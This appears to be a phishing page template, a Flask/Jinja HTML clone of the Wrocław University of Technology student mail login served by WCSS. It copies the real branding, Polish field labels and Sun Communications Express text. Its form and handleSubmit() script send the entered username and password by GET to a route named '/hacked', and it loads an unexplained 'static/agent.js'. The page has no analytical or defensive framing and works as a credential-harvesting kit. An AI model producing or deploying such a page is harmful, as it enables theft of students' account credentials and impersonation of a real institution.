<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>SYSTEM POCZTY STUDENCKIEJ   | Wroclawskie Centrum Sieciowo-Superkomputerowe</title>
<style type="text/css">

/* klasa odsylacza <a...> */
a.link_1  {font-size:10pt;
               padding:0px;
               font-family:arial,helvetica,sans-serif;
               font-weight:normal;
               text-decoration:none;
               color:#993300;}

/* pseudoklasa 'mouseover' */
a.link_1:hover {font-weight:normal;
                text-decoration:underline;
                background-color:#ffffff;
                color:#ff0000;}


.cldialog {font-size:10pt;
               font-family:arial,helvetica,sans-serif;
               font-weight:bold;
               color:#993300;}


.ctdialog {font-size:10pt;
               padding-left:2px;
               font-family:arial,helvetica,sans-serif;
               font-weight:bold;
               border-width:1px;
               border-color:#993300;
               color:#663300;}

.csdialog {font-size:10pt;
               font-family:arial,helvetica,sans-serif;
               font-weight:bold;
               border-left-width:1px;
               border-top-width:1px;
               border-right-width:1px;
               border-bottom-width:1px;
               border-color:#993300;
               background-color:#993300;
               color:#ffffff;}
.csfocus {font-size:10pt;
                 font-family:arial,helvetica,sans-serif;
                 font-weight:bold;
                 border-left-width:1px;
                 border-top-width:1px;
                 border-right-width:1px;
                 border-bottom-width:1px;
                 border-color:#ffff00;
                 background-color:#444444;
                 color:#ffff00;}

.info_1 {font-size:8pt;
                 font-family:arial,helvetica,sans-serif;
                 font-weight:normal;
                 color:#666666;}

.err         {font-size:10pt;
               padding-left:2px;
               font-family:arial,helvetica,sans-serif;
               font-weight:bold;
               color:#ff0000;}
</style>

<script type="text/javascript" src="static/agent.js"></script>
<link href="{{ url_for('static', filename='master-style_ns6up.css') }}" type="text/css" rel="stylesheet">
<link href="{{ url_for('static', filename='mail_css_ns6up.css') }}" type="text/css" rel="stylesheet">

<script type="text/javascript">
     var user = ''
     var error = ''
     var st = window.location.search

     //parametry przekazane w URI
     if (st) {
       var slen = st.length
       var est = st.indexOf("&error")
       var ust = st.indexOf("?user")
       if (est != -1) {
         error = st.substring(est+7, slen)
         slen = est
       }
       if (ust != -1)
         user = st.substring(ust+6, slen)
     }


     function errorHTML() {
       var s='';
       if (error){
         if (error.indexOf("Login%20incorrect")!==-1)
         s="<img src='./uwc/images/err_1.gif' alt='' border='0'>";
        }
       if (user && !error)
         s="<img src='./uwc/images/err_2.gif' alt='' border='0'>";
       if (error || user)
        document.write(s);
     }
</script>

<script src="{{ url_for('static', filename='browserVersion.js')}}" type="text/javascript"></script>
<script type="text/javascript">
var copyRight = null;
var productName = null;
var logoImagePath = null;
var versionImagePath = null;
var versionPageTitle = null;
var closeLabel = null;
var closeTitle = null;
var LoginImagePath = null;

function handleLoad()
{
copyRight="Copyright © 2008 Sun Microsystems, Inc. All rights reserved. SUN PROPRIETARY/CONFIDENTIAL. U.S. Government Rights - Commercial software. Government users are subject to the Sun Microsystems, Inc. standard license agreement and applicable provisions of the FAR and its supplements. Use is subject to license terms. Sun, Sun Microsystems, the Sun logo and Java are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries.";
productName="Sun Java(TM) System Communications Express 6.3 update 1";
logoImagePath="./uwc/images/login-logo.gif";
versionImagePath="./../images/S1MC_login.gif";
versionPageTitle="Version Information";
closeLabel="Close";
closeTitle="Close Window";
document.form1.username.focus();
}


function handleSubmit() {
  var targetAction =  "/hacked";
  document.form1.action = targetAction;
  document.form1.submit();
}



function handleError() {
	if (false || false ) {
		document.write('<DIV class=logErr>');
		document.write('<table cellspacing=0 cellpadding=0 border=0>');
		document.write('<tbody>');
	        document.write('<tr>');
		document.write('<td valign=top width="28"><img src="./uwc/images/Error_Large.gif" alt="" width="21" height="22">&nbsp;&nbsp;</td>');
		document.write("<td width='233'> <span class='err'> Authentication Failed<br> Reenter your username and password.</span> </td>");

		document.write('</tr>');
		document.write('</tbody>');
		document.write('</table>');
		document.write('</DIV>');
	}

}

</script>


</head>
<body onload="handleLoad()" topmargin="10" marginwidth="10" marginheight="10" leftmargin="10" bgcolor="#ffffff">


<table width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff" align="center">
 <tbody><tr>
  <td>
      <div align="left">
       <a href="http://www.pwr.edu.pl/" target="_blank">
       <img src="{{ url_for('static', filename='pwr_2.gif')}}" alt="" vspace="0" hspace="0" border="0"><br>
       </a>
       <img src="{{ url_for('static', filename='spacer.gif')}}" alt="" width="1" vspace="0" hspace="0" height="20" border="0">
      </div>
  </td>
 </tr>
</tbody></table>




<table width="100%" cellspacing="0" cellpadding="0" border="0" align="center">
 <tbody><tr>
  <td valign="top" align="center">
   <img src="{{ url_for('static', filename='spacer.gif')}}" alt="" width="1" vspace="0" hspace="0" height="20" border="0"><br>
   <img src="{{ url_for('static', filename='stu_1.gif')}}" alt="" vspace="0" hspace="0" border="0">
  </td>
 </tr>
</tbody></table>

<div align="center">
 <img src="{{ url_for('static', filename='spacer.gif')}}" alt="" width="1" vspace="0" hspace="0" height="20" border="0"><br>
 <img src="{{ url_for('static', filename='hr_1_ani.gif')}}" alt="" width="100%" vspace="0" hspace="0" height="2" border="0">
</div>

<img src="{{ url_for('static', filename='spacer.gif')}}" alt="" width="1" vspace="0" hspace="0" height="20" border="0"><br>




<table width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff" align="center">
<tbody><tr><td align="center"><img src="{{ url_for('static', filename='prof_1.gif')}}" alt="" border="0"></td></tr>
<tr>
<td>

            <table width="70%" cellspacing="0" cellpadding="4" border="0" align="center">
             <tbody><tr>
              <td class="err" colspan="2" align="center">
               <img src="{{ url_for('static', filename='spacer.gif')}}" alt="" width="1" vspace="0" hspace="0" height="30" border="0">
               	<script type="text/javascript">handleError();</script>
              </td>
             </tr>
            </tbody></table>

<form name="form1" onsubmit="handleSubmit()" action="/hacked" method="get">
<input type="hidden" name="fromlogin" value="true">

<input type="hidden" name="orgaccess" value="http">
 <table cellspacing="0" cellpadding="4" border="0" align="center">
  <tbody><tr>
   <td class="cldialog" align="right">
   nazwa konta:
   </td>
   <td align="left"> <input class="ctdialog" type="text" size="24" id="username" tabindex="1" name="username">
    <script type="text/javascript">document.forms[0].user.focus();</script>
   </td>
  </tr>
  <tr>
   <td class="cldialog" align="right">
   hasło:
   </td>
   <td align="left">
    <input class="ctdialog" type="password" name="password" size="24" id="password" tabindex="2">
   </td>
  </tr>
  <tr>
   <td>&nbsp;</td>
   <td align="left">
    <img src="{{ url_for('static', filename='spacer.gif')}}" alt="" width="1" vspace="0" hspace="0" height="10" border="0">
    <br>

    <input class="csdialog" id="button" onblur="this.className='csfocus'" onmouseover="this.className='csfocus'" title="Log In" onfocus="this.className='csfocus'" onclick="handleSubmit(); return false;" tabindex="3" onmouseout="this.className='csdialog'" type="submit" value="     Log In     " name="Button2">
   </td>
  </tr>
 </tbody></table>
</form>


        <div align="center">

<p style="font-family: Verdana; font-size:12px; color:#346A2D;font-weight:bold;">
<br>Wszelkie uwagi zwiazane z obsluga interfejsu prosimy przesylac na adres <a name="tex2html12" href="mailto: smail@pwr.edu.pl">smail@pwr.edu.pl</a>.</p><br>


         <img src="{{ url_for('static', filename='spacer.gif')}}" alt="" width="1" vspace="0" hspace="0" height="30" border="0"><br>
         <img src="{{ url_for('static', filename='hr_1.gif')}}" alt="" width="100%" vspace="0" hspace="0" height="1" border="0">
         <img src="{{ url_for('static', filename='/spacer.gif')}}" alt="" width="1" vspace="0" hspace="0" height="4" border="0"><br>
        </div>

         <table align="center">
         <tbody><tr>
             <td valign="middle">
             <a href="http://www.wcss.wroc.pl/" title=" Wrocławskie Centrum Sieciowo-Superkomputerowe ">
             <img src="{{ url_for('static', filename='wcss_20.gif')}}" alt=" Wrocławskie Centrum Sieciowo-Superkomputerowe " vspace="0" hspace="0" border="0">
             </a>
             </td>
             <td valign="middle">
             <div class="info_1" align="center">
              serwer prowadzi Wrocławskie Centrum Sieciowo-Superkomputerowe
             </div>
             </td>
         </tr>
         </tbody></table>
  </td></tr></tbody></table>

</body></html>
